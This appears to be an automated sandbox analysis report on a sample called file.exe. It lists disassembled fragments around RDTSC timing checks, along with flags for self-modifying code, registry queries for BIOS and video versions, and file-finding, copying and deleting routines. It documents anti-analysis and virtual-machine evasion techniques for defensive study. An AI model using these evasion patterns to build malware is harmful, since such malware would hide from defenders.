                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596CE9 second address: 596D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007F8480C71BFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596D04 second address: 596D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E6E second address: 596E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E74 second address: 596EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F8480E31392h 0x0000000f jmp 00007F8480E31391h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596EA3 second address: 596EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596EA9 second address: 596EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596EAE second address: 596EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C01h 0x00000007 jmp 00007F8480C71BFBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8480C71C05h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596417 second address: 59641E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59641E second address: 596429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597362 second address: 597380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8480E31390h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597380 second address: 5973A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8480C71C05h 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EE01 second address: 3A1BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E3138Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, ebx 0x0000000f push dword ptr [ebp+122D019Dh] 0x00000015 jmp 00007F8480E31391h 0x0000001a and ecx, 7F77EEB4h 0x00000020 call dword ptr [ebp+122D19B7h] 0x00000026 pushad 0x00000027 cld 0x00000028 xor eax, eax 0x0000002a pushad 0x0000002b mov eax, 586B7E9Bh 0x00000030 mov ebx, dword ptr [ebp+122D2AF3h] 0x00000036 popad 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b sub dword ptr [ebp+122D275Ch], eax 0x00000041 mov dword ptr [ebp+122D2A63h], eax 0x00000047 mov dword ptr [ebp+122D275Ch], edx 0x0000004d mov esi, 0000003Ch 0x00000052 mov dword ptr [ebp+122D275Ch], edx 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c js 00007F8480E3138Ch 0x00000062 mov dword ptr [ebp+122D275Ch], esi 0x00000068 lodsw 0x0000006a mov dword ptr [ebp+122D275Ch], ebx 0x00000070 je 00007F8480E31390h 0x00000076 pushad 0x00000077 push edi 0x00000078 pop edx 0x00000079 jg 00007F8480E31386h 0x0000007f popad 0x00000080 add eax, dword ptr [esp+24h] 0x00000084 add dword ptr [ebp+122D275Ch], edx 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e jno 00007F8480E3138Dh 0x00000094 nop 0x00000095 push eax 0x00000096 push edx 0x00000097 pushad 0x00000098 jmp 00007F8480E3138Ah 0x0000009d jnc 00007F8480E31386h 0x000000a3 popad 0x000000a4 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EFBA second address: 55EFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jl 00007F8480C71C0Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EFCD second address: 55EFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EFD1 second address: 55F02E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F8480C71C09h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F8480C71C00h 0x00000019 pop eax 0x0000001a movsx ecx, cx 0x0000001d call 00007F8480C71BF9h 0x00000022 pushad 0x00000023 jc 00007F8480C71BFCh 0x00000029 jg 00007F8480C71BF6h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F02E second address: 55F047 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480E3138Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F047 second address: 55F076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8480C71BF8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jno 00007F8480C71C04h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F076 second address: 55F07C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F07C second address: 55F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1D1 second address: 55F1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E3138Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1DF second address: 55F1EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 cmc 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1EF second address: 55F1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1F3 second address: 55F201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F8480C71BF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F5E0 second address: 55F5EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F5EA second address: 55F5FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F8480C71BF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FA2E second address: 55FA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F8480E31388h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push 0000001Eh 0x00000027 add dword ptr [ebp+122D28A4h], esi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jns 00007F8480E3138Ch 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FA6E second address: 55FA7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480C71BFCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FCEC second address: 55FD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e jmp 00007F8480E3138Ch 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD0B second address: 55FD18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD18 second address: 55FD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD8B second address: 55FD91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD91 second address: 55FD96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD96 second address: 53AC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8480C71C02h 0x0000000d nop 0x0000000e jc 00007F8480C71C01h 0x00000014 jnp 00007F8480C71BFBh 0x0000001a lea eax, dword ptr [ebp+124905E3h] 0x00000020 and edi, dword ptr [ebp+122D28DBh] 0x00000026 push eax 0x00000027 jo 00007F8480C71C0Ah 0x0000002d jmp 00007F8480C71C04h 0x00000032 mov dword ptr [esp], eax 0x00000035 mov dword ptr [ebp+122D3A51h], ecx 0x0000003b lea eax, dword ptr [ebp+1249059Fh] 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F8480C71BF8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b push eax 0x0000005c push edi 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 jmp 00007F8480C71BFCh 0x00000065 popad 0x00000066 pop edi 0x00000067 mov dword ptr [esp], eax 0x0000006a mov dx, 9A3Eh 0x0000006e call dword ptr [ebp+122DB809h] 0x00000074 pushad 0x00000075 push edx 0x00000076 push eax 0x00000077 pop eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B626 second address: 59B62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B77A second address: 59B780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B8C5 second address: 59B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B8C9 second address: 59B8D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB54 second address: 59BB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB62 second address: 59BB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB66 second address: 59BB6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB6C second address: 59BB73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB73 second address: 59BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8480E31386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD10 second address: 59BD23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD23 second address: 59BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD27 second address: 59BD44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8480C71BFBh 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BED0 second address: 59BED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BED4 second address: 59BEE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BEE7 second address: 59BF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E3138Fh 0x00000009 jmp 00007F8480E31397h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FEA0 second address: 59FEB9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F8480C71C1Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F8480C71BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FEB9 second address: 59FEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FEBD second address: 59FEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0152 second address: 5A0162 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A66A5 second address: 5A66AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6096 second address: 5A60A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480E31386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A60A0 second address: 5A60BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jne 00007F8480C71BF6h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AADC3 second address: 5AADC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB06F second address: 5AB076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB076 second address: 5AB07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1A4 second address: 5AB1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1A8 second address: 5AB1E5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8480E31386h 0x00000008 jmp 00007F8480E31395h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8480E31396h 0x00000014 pop edx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1E5 second address: 5AB1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB47C second address: 5AB484 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB484 second address: 5AB496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480C71BFCh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB496 second address: 5AB49A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F847 second address: 55F8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007F8480C71C02h 0x0000000c nop 0x0000000d jmp 00007F8480C71BFFh 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F8480C71BF8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e jnp 00007F8480C71C0Eh 0x00000034 nop 0x00000035 jbe 00007F8480C71BFCh 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007F8480C71BFCh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B073B second address: 5B074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480E3138Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B08BE second address: 5B08C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0E40 second address: 5B0E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0E44 second address: 5B0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F8480C71BF8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0E6D second address: 5B0E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B74A5 second address: 5B74AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B74AB second address: 5B74AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B74AF second address: 5B74BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7A89 second address: 5B7A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3A1C06 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 54DBAF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5726EB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5D9682 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_001538B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00154910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00154910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0014DA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0014E430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0014ED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00154570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00154570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0014DE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0014BE70
